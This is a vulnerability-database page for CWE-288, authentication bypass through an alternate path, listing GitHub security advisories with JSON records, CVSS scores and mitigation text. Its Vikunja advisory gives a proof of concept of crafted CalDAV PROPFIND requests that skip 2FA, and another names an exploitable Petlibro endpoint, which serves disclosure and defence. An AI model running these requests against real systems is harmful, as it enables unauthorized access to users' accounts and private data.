Common Weakness Enumeration

CWE-288

Allowed

Authentication Bypass Using an Alternate Path or Channel

Abstraction: Base · Status: Incomplete

The product requires authentication, but the product has an alternate path or channel that does not require authentication.

1072 vulnerabilities reference this CWE, most recent first.

GHSA-3W64-72GJ-893R

Vulnerability from github – Published: 2023-09-14 21:30 – Updated: 2026-05-21 09:32
VLAI
Details

Authentication Bypass Using an Alternate Path or Channel vulnerability in Yepas Digital Yepas allows Authentication Bypass.This issue affects Digital Yepas: before 1.0.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-4702"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-14T20:15:12Z",
    "severity": "CRITICAL"
  },
  "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Yepas Digital Yepas allows Authentication Bypass.This issue affects Digital Yepas: before 1.0.1.",
  "id": "GHSA-3w64-72gj-893r",
  "modified": "2026-05-21T09:32:05Z",
  "published": "2023-09-14T21:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4702"
    },
    {
      "type": "WEB",
      "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0526"
    },
    {
      "type": "WEB",
      "url": "https://www.usom.gov.tr/bildirim/tr-23-0526"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3X5X-62PF-8JPR

Vulnerability from github – Published: 2025-11-10 21:30 – Updated: 2025-11-12 21:31
VLAI
Details

Policy bypass in Extensions in Google Chrome prior to 142.0.7444.59 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Low)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-12445"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-10T20:15:39Z",
    "severity": "MODERATE"
  },
  "details": "Policy bypass in Extensions in Google Chrome prior to 142.0.7444.59 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Low)",
  "id": "GHSA-3x5x-62pf-8jpr",
  "modified": "2025-11-12T21:31:06Z",
  "published": "2025-11-10T21:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12445"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2025/10/stable-channel-update-for-desktop_28.html"
    },
    {
      "type": "WEB",
      "url": "https://issues.chromium.org/issues/428397712"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3XGG-6RWW-2J3W

Vulnerability from github – Published: 2024-11-28 18:38 – Updated: 2024-11-28 18:38
VLAI
Details

The JobSearch WP Job Board plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.6.7. This is due to the plugin not properly verifying a users identity when verifying an email address through the user_account_activation function. This makes it possible for unauthenticated attackers to log in as any user, including site administrators if the users email is known.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-11925"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-28T07:15:05Z",
    "severity": "CRITICAL"
  },
  "details": "The JobSearch WP Job Board plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.6.7. This is due to the plugin not properly verifying a users identity when verifying an email address through the user_account_activation function. This makes it possible for unauthenticated attackers to log in as any user, including site administrators if the users email is known.",
  "id": "GHSA-3xgg-6rww-2j3w",
  "modified": "2024-11-28T18:38:35Z",
  "published": "2024-11-28T18:38:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11925"
    },
    {
      "type": "WEB",
      "url": "https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/04bc8101-2676-4695-a498-f79be8221617?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3XW3-M65R-4F37

Vulnerability from github – Published: 2024-10-29 18:30 – Updated: 2026-04-08 18:33
VLAI
Details

The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.15. This is due to missing validation on the user being supplied in the 'crypto_connect_ajax_process::register' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-9988"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-29T17:15:05Z",
    "severity": "CRITICAL"
  },
  "details": "The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.15. This is due to missing validation on the user being supplied in the \u0027crypto_connect_ajax_process::register\u0027 function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.",
  "id": "GHSA-3xw3-m65r-4f37",
  "modified": "2026-04-08T18:33:39Z",
  "published": "2024-10-29T18:30:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9988"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/crypto/tags/2.10/includes/class-crypto_connect_ajax_register.php#L91"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3195424/crypto#file3"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7bfe87cf-9883-4f8f-a0f5-23bbc7bb9b7c?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-42RJ-C8WW-P58F

Vulnerability from github – Published: 2023-12-19 18:30 – Updated: 2023-12-19 18:30
VLAI
Details

A potential security vulnerability has been identified in HPE Integrated Lights-Out 5 (iLO 5) and Integrated Lights-Out 6 (iLO 6). The vulnerability could be remotely exploited to allow authentication bypass.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-50272"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-12-19T16:15:12Z",
    "severity": "HIGH"
  },
  "details": "A potential security vulnerability has been identified in HPE Integrated Lights-Out 5 (iLO 5) and Integrated Lights-Out 6 (iLO 6). The vulnerability could be remotely exploited to allow authentication bypass.",
  "id": "GHSA-42rj-c8ww-p58f",
  "modified": "2023-12-19T18:30:32Z",
  "published": "2023-12-19T18:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50272"
    },
    {
      "type": "WEB",
      "url": "https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US\u0026docId=hpesbhf04584en_us"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-438F-R8M8-H4GG

Vulnerability from github – Published: 2025-07-22 12:30 – Updated: 2025-07-22 12:30
VLAI
Details

The Orion Login with SMS plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.0.5. This is due to the olws_handle_verify_phone() function not utilizing a strong enough OTP value, exposing the hash needed to generate the OTP value, and no restrictions on the number of attempts to submit the code. This makes it possible for unauthenticated attackers to log in as other users, including administrators, if they have access to their phone number.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-7692"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-22T10:15:26Z",
    "severity": "HIGH"
  },
  "details": "The Orion Login with SMS plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.0.5. This is due to the olws_handle_verify_phone() function not utilizing a strong enough OTP value, exposing the hash needed to generate the OTP value, and no restrictions on the number of attempts to submit the code. This makes it possible for unauthenticated attackers to log in as other users, including administrators, if they have access to their phone number.",
  "id": "GHSA-438f-r8m8-h4gg",
  "modified": "2025-07-22T12:30:44Z",
  "published": "2025-07-22T12:30:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7692"
    },
    {
      "type": "WEB",
      "url": "https://wordpress.org/plugins/orion-login-with-sms"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/31a47cbd-c19b-4ac3-87ed-2d4c5c0e9cb7?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-439Q-G9X9-RR2V

Vulnerability from github – Published: 2025-09-19 06:31 – Updated: 2025-09-19 06:31
VLAI
Details

The Service Finder SMS System plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.0.0. This is due to the plugin not verifying a user's phone number before logging them in. This makes it possible for unauthenticated attackers to login as arbitrary users.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-5955"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-19T05:15:33Z",
    "severity": "HIGH"
  },
  "details": "The Service Finder SMS System plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.0.0. This is due to the plugin not verifying a user\u0027s phone number before logging them in. This makes it possible for unauthenticated attackers to login as arbitrary users.",
  "id": "GHSA-439q-g9x9-rr2v",
  "modified": "2025-09-19T06:31:22Z",
  "published": "2025-09-19T06:31:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5955"
    },
    {
      "type": "WEB",
      "url": "https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc4598a7-d5cf-4553-b29a-659fe288ece9?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-472G-2PWF-QM99

Vulnerability from github – Published: 2026-01-04 00:30 – Updated: 2026-01-04 00:30
VLAI
Details

Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an information disclosure vulnerability that allows unauthorized access to private audio recordings by exploiting sequential audio IDs and insecure assignment endpoints. Attackers can send requests to /device/deviceAudio/use with arbitrary audio IDs to assign recordings to any device, then retrieve audio URLs to access other users' private recordings.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-3652"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-04T00:15:43Z",
    "severity": "MODERATE"
  },
  "details": "Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an information disclosure vulnerability that allows unauthorized access to private audio recordings by exploiting sequential audio IDs and insecure assignment endpoints. Attackers can send requests to /device/deviceAudio/use with arbitrary audio IDs to assign recordings to any device, then retrieve audio URLs to access other users\u0027 private recordings.",
  "id": "GHSA-472g-2pwf-qm99",
  "modified": "2026-01-04T00:30:16Z",
  "published": "2026-01-04T00:30:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3652"
    },
    {
      "type": "WEB",
      "url": "https://bobdahacker.com/blog/petlibro"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/petlibro-smart-pet-feeder-platform-through-audio-information-disclosure-via-api-endpoint"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-47CR-F226-R4PQ

Vulnerability from github – Published: 2026-03-20 17:25 – Updated: 2026-03-25 20:53
VLAI
Summary
Vikunja has a 2FA Bypass via Caldav Basic Auth
Details

Summary

The Caldav endpoint allows login using Basic Authentication, which in turn allows users to bypass the TOTP on 2FA-enabled accounts. The user can then access standard project information that would normally be protected behind 2FA (if enabled), such as project name, description, etc.

Details

The two files below show that when a user is accessing Caldav via Basic Authentication, it skips all steps involving 2FA. The order of operations is essentially: 1. Retrieve basic credentials. 2. Verify username. 3. Verify password. 4. Success

pkg/routes/caldav/auth.go:45

u, err := checkUserCaldavTokens(s, credentials)
    if user.IsErrUserDoesNotExist(err) {
        return false, nil
    }
    if u == nil {
        u, err = user.CheckUserCredentials(s, credentials)
        if err != nil {
            log.Errorf("Error during basic auth for caldav: %v", err)
            return false, nil
        }
    }

pkg/user/user.go:358

func CheckUserCredentials(s *xorm.Session, u *Login) (*User, error) {
    // Check if we have any credentials
    if u.Password == "" || u.Username == "" {
        return nil, ErrNoUsernamePassword{}
    }

    // Check if the user exists
    user, err := getUserByUsernameOrEmail(s, u.Username)
    if err != nil {
        // hashing the password takes a long time, so we hash something to not make it clear if the username was wrong
        _, _ = bcrypt.GenerateFromPassword([]byte(u.Username), 14)
        return nil, ErrWrongUsernameOrPassword{}
    }

    if user.Issuer != IssuerLocal {
        return user, &ErrAccountIsNotLocal{UserID: user.ID}
    }

    // The user is invalid if they need to verify their email address
    if user.Status == StatusEmailConfirmationRequired {
        return &User{}, ErrEmailNotConfirmed{UserID: user.ID}
    }

    // Check the users password
    err = CheckUserPassword(user, u.Password)
    if err != nil {
        if IsErrWrongUsernameOrPassword(err) {
            handleFailedPassword(user)
        }
        return user, err
    }

    return user, nil
}

PoC

  1. Setup a Docker instance of Vikunja v2.1.0 and create an account. Enable 2FA on the account. CleanShot 2026-03-16 at 15 30 24@2x

  2. Logout of the account.

  3. Using a web proxy, such as Burp Suite, craft an HTTP request to the endpoint similar to the one shown below. Ensure that the 2FA-enabled user's username and password is properly Base64-encoded and inserted into the Authorization header.
PROPFIND /dav/principals/ HTTP/1.1
Host: 127.0.0.1:3456
Authorization: Basic {{ REDACTED }}
[ TRUNCATED ]

<?xml version="1.0"?><d:propfind xmlns:d="DAV:"><d:prop><d:displayname/><d:resourcetype/></d:prop></d:propfind>
  1. Observe that the response contains authenticated user information.
HTTP/1.1 207 Multi-Status
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 16 Mar 2026 19:31:47 GMT
Content-Length: 398

<?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:" xmlns:C="urn:ietf:params:xml:ns:caldav" xmlns:CS="http://calendarserver.org/ns/"><D:response><D:href>/dav/projects</D:href><D:propstat><D:prop><D:displayname>projects</D:displayname>
[ TRUNCATED ]
  1. Other requests can then be crafted to retrieve more information about a specific project, such as the one below.
PROPFIND /dav/projects/1/{{ PROJECT NAME }}/ HTTP/1.1
Host: 127.0.0.1:3456
Authorization: Basic [ REDACTED ]
[TRUNCATED]

<?xml version="1.0"?><c:calendar-query xmlns:d="DAV:" xmlns:c="urn:ietf:params:xml:ns:caldav"><d:prop><d:getetag/><c:calendar-data/></d:prop><c:filter><c:comp-filter name="VCALENDAR"><c:comp-filter name="VTODO"/></c:comp-filter></c:filter></c:calendar-query>
HTTP/1.1 207 Multi-Status
Content-Type: text/xml; charset=utf-8
[ TRUNCATED ]

[ TRUNCATED ]
<D:prop><C:calendar-data>BEGIN:VCALENDAR&#xA;VERSION:2.0&#xA;X-PUBLISHED-TTL:PT4H&#xA;X-WR-CALNAME:Inbox&#xA;PRODID:-//Vikunja Todo App//EN&#xA;BEGIN:VTODO&#xA;UID:8gb6eclz-dad5-4a38-80a8-09005707eb51&#xA;DTSTAMP:20260316T190905Z&#xA;SUMMARY:test&#xA;DESCRIPTION:&lt;p&gt;description&lt;/p&gt;&#xA;CREATED:20260301T203712Z&#xA;LAST-MODIFIED:20260316T190905Z&#xA;BEGIN:VALARM&#xA;TRIGGER;VALUE=DATE-TIME:20260316T130000Z&#xA;ACTION:DISPLAY&#xA;DESCRIPTION:test&#xA;END:VALARM&#xA;END:VTODO&#xA;END:VCALENDAR</C:calendar-data></D:prop><D:status>HTTP/1.1 200 OK
[ TRUNCATED ]

Impact

Any user that has 2FA enabled could have it bypassed, allowing attacker access to a lot of the user's project information.

Remediation

If there are 2FA barriers to access an account in a specific fashion, all integrations should follow those if they're using the same methods of authentication. The easiest path is probably to disable Basic Authentication for Caldav by default, but keep the token access enabled, that way users can generate tokens specifically for Caldav if they want to use that feature. Basic Auth for it could be kept, but would most likely want to be a feature flag or something along those lines. That's so users can turn it on if it's necessary, but can be notified in the documentation that it's a more unsafe pattern if 2FA is enabled.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "code.vikunja.io/api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33315"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T17:25:35Z",
    "nvd_published_at": "2026-03-24T15:16:35Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe Caldav endpoint allows login using Basic Authentication, which in turn allows users to bypass the TOTP on 2FA-enabled accounts. The user can then access standard project information that would normally be protected behind 2FA (if enabled), such as project name, description, etc.\n\n### Details\nThe two files below show that when a user is accessing Caldav via Basic Authentication, it skips all steps involving 2FA. The order of operations is essentially:\n1. Retrieve basic credentials.\n2. Verify username.\n3. Verify password.\n4. Success\n\n**pkg/routes/caldav/auth.go:45**\n```go\nu, err := checkUserCaldavTokens(s, credentials)\n\tif user.IsErrUserDoesNotExist(err) {\n\t\treturn false, nil\n\t}\n\tif u == nil {\n\t\tu, err = user.CheckUserCredentials(s, credentials)\n\t\tif err != nil {\n\t\t\tlog.Errorf(\"Error during basic auth for caldav: %v\", err)\n\t\t\treturn false, nil\n\t\t}\n\t}\n```\n\n**pkg/user/user.go:358**\n```go\nfunc CheckUserCredentials(s *xorm.Session, u *Login) (*User, error) {\n\t// Check if we have any credentials\n\tif u.Password == \"\" || u.Username == \"\" {\n\t\treturn nil, ErrNoUsernamePassword{}\n\t}\n\n\t// Check if the user exists\n\tuser, err := getUserByUsernameOrEmail(s, u.Username)\n\tif err != nil {\n\t\t// hashing the password takes a long time, so we hash something to not make it clear if the username was wrong\n\t\t_, _ = bcrypt.GenerateFromPassword([]byte(u.Username), 14)\n\t\treturn nil, ErrWrongUsernameOrPassword{}\n\t}\n\n\tif user.Issuer != IssuerLocal {\n\t\treturn user, \u0026ErrAccountIsNotLocal{UserID: user.ID}\n\t}\n\n\t// The user is invalid if they need to verify their email address\n\tif user.Status == StatusEmailConfirmationRequired {\n\t\treturn \u0026User{}, ErrEmailNotConfirmed{UserID: user.ID}\n\t}\n\n\t// Check the users password\n\terr = CheckUserPassword(user, u.Password)\n\tif err != nil {\n\t\tif IsErrWrongUsernameOrPassword(err) {\n\t\t\thandleFailedPassword(user)\n\t\t}\n\t\treturn user, err\n\t}\n\n\treturn user, nil\n}\n```\n\n### PoC\n1. Setup a Docker instance of Vikunja `v2.1.0` and create an account. Enable 2FA on the account.\n\u003cimg width=\"1506\" height=\"646\" alt=\"CleanShot 2026-03-16 at 15 30 24@2x\" src=\"https://github.com/user-attachments/assets/e88522af-4333-4758-8ba4-3e34de9680f7\" /\u003e\n\n2. Logout of the account.\n3. Using a web proxy, such as Burp Suite, craft an HTTP request to the endpoint similar to the one shown below. Ensure that the 2FA-enabled user\u0027s username and password is properly Base64-encoded and inserted into the `Authorization` header.\n\n```http\nPROPFIND /dav/principals/ HTTP/1.1\nHost: 127.0.0.1:3456\nAuthorization: Basic {{ REDACTED }}\n[ TRUNCATED ]\n\n\u003c?xml version=\"1.0\"?\u003e\u003cd:propfind xmlns:d=\"DAV:\"\u003e\u003cd:prop\u003e\u003cd:displayname/\u003e\u003cd:resourcetype/\u003e\u003c/d:prop\u003e\u003c/d:propfind\u003e\n```\n5. Observe that the response contains authenticated user information.\n```http\nHTTP/1.1 207 Multi-Status\nContent-Type: text/xml; charset=utf-8\nVary: Accept-Encoding\nDate: Mon, 16 Mar 2026 19:31:47 GMT\nContent-Length: 398\n\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\u003cD:multistatus xmlns:D=\"DAV:\" xmlns:C=\"urn:ietf:params:xml:ns:caldav\" xmlns:CS=\"http://calendarserver.org/ns/\"\u003e\u003cD:response\u003e\u003cD:href\u003e/dav/projects\u003c/D:href\u003e\u003cD:propstat\u003e\u003cD:prop\u003e\u003cD:displayname\u003eprojects\u003c/D:displayname\u003e\n[ TRUNCATED ]\n```\n6. Other requests can then be crafted to retrieve more information about a specific project, such as the one below.\n```http\nPROPFIND /dav/projects/1/{{ PROJECT NAME }}/ HTTP/1.1\nHost: 127.0.0.1:3456\nAuthorization: Basic [ REDACTED ]\n[TRUNCATED]\n\n\u003c?xml version=\"1.0\"?\u003e\u003cc:calendar-query xmlns:d=\"DAV:\" xmlns:c=\"urn:ietf:params:xml:ns:caldav\"\u003e\u003cd:prop\u003e\u003cd:getetag/\u003e\u003cc:calendar-data/\u003e\u003c/d:prop\u003e\u003cc:filter\u003e\u003cc:comp-filter name=\"VCALENDAR\"\u003e\u003cc:comp-filter name=\"VTODO\"/\u003e\u003c/c:comp-filter\u003e\u003c/c:filter\u003e\u003c/c:calendar-query\u003e\n```\n\n```http\nHTTP/1.1 207 Multi-Status\nContent-Type: text/xml; charset=utf-8\n[ TRUNCATED ]\n\n[ TRUNCATED ]\n\u003cD:prop\u003e\u003cC:calendar-data\u003eBEGIN:VCALENDAR\u0026#xA;VERSION:2.0\u0026#xA;X-PUBLISHED-TTL:PT4H\u0026#xA;X-WR-CALNAME:Inbox\u0026#xA;PRODID:-//Vikunja Todo App//EN\u0026#xA;BEGIN:VTODO\u0026#xA;UID:8gb6eclz-dad5-4a38-80a8-09005707eb51\u0026#xA;DTSTAMP:20260316T190905Z\u0026#xA;SUMMARY:test\u0026#xA;DESCRIPTION:\u0026lt;p\u0026gt;description\u0026lt;/p\u0026gt;\u0026#xA;CREATED:20260301T203712Z\u0026#xA;LAST-MODIFIED:20260316T190905Z\u0026#xA;BEGIN:VALARM\u0026#xA;TRIGGER;VALUE=DATE-TIME:20260316T130000Z\u0026#xA;ACTION:DISPLAY\u0026#xA;DESCRIPTION:test\u0026#xA;END:VALARM\u0026#xA;END:VTODO\u0026#xA;END:VCALENDAR\u003c/C:calendar-data\u003e\u003c/D:prop\u003e\u003cD:status\u003eHTTP/1.1 200 OK\n[ TRUNCATED ]\n```\n\n### Impact\nAny user that has 2FA enabled could have it bypassed, allowing attacker access to a lot of the user\u0027s project information. \n\n### Remediation\nIf there are 2FA barriers to access an account in a specific fashion, all integrations should follow those if they\u0027re using the same methods of authentication. The easiest path is probably to disable Basic Authentication for Caldav by default, but keep the token access enabled, that way users can generate tokens specifically for Caldav if they want to use that feature. Basic Auth for it could be kept, but would most likely want to be a feature flag or something along those lines. That\u0027s so users can turn it on if it\u0027s necessary, but can be notified in the documentation that it\u0027s a more unsafe pattern if 2FA is enabled.",
  "id": "GHSA-47cr-f226-r4pq",
  "modified": "2026-03-25T20:53:21Z",
  "published": "2026-03-20T17:25:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-47cr-f226-r4pq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33315"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/commit/cdf5d30a425d032f749b78b98b828f25ad882615"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/go-vikunja/vikunja"
    },
    {
      "type": "WEB",
      "url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Vikunja has a 2FA Bypass via Caldav Basic Auth"
}

GHSA-47H2-H6Q2-GHRW

Vulnerability from github – Published: 2023-10-23 00:30 – Updated: 2024-04-04 08:52
VLAI
Details

WALLIX Bastion 9.x before 9.0.9 and 10.x before 10.0.5 allows unauthenticated access to sensitive information by bypassing access control on a network access administration web interface.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-46319"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-10-23T00:15:08Z",
    "severity": "HIGH"
  },
  "details": "WALLIX Bastion 9.x before 9.0.9 and 10.x before 10.0.5 allows unauthenticated access to sensitive information by bypassing access control on a network access administration web interface.",
  "id": "GHSA-47h2-h6q2-ghrw",
  "modified": "2024-04-04T08:52:50Z",
  "published": "2023-10-23T00:30:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46319"
    },
    {
      "type": "WEB",
      "url": "https://www.wallix.com/support/alerts"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Funnel all access through a single choke point to simplify how users can access a resource. For every access, perform a check to determine if the user has permissions to access the resource.

CAPEC-127: Directory Indexing

An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.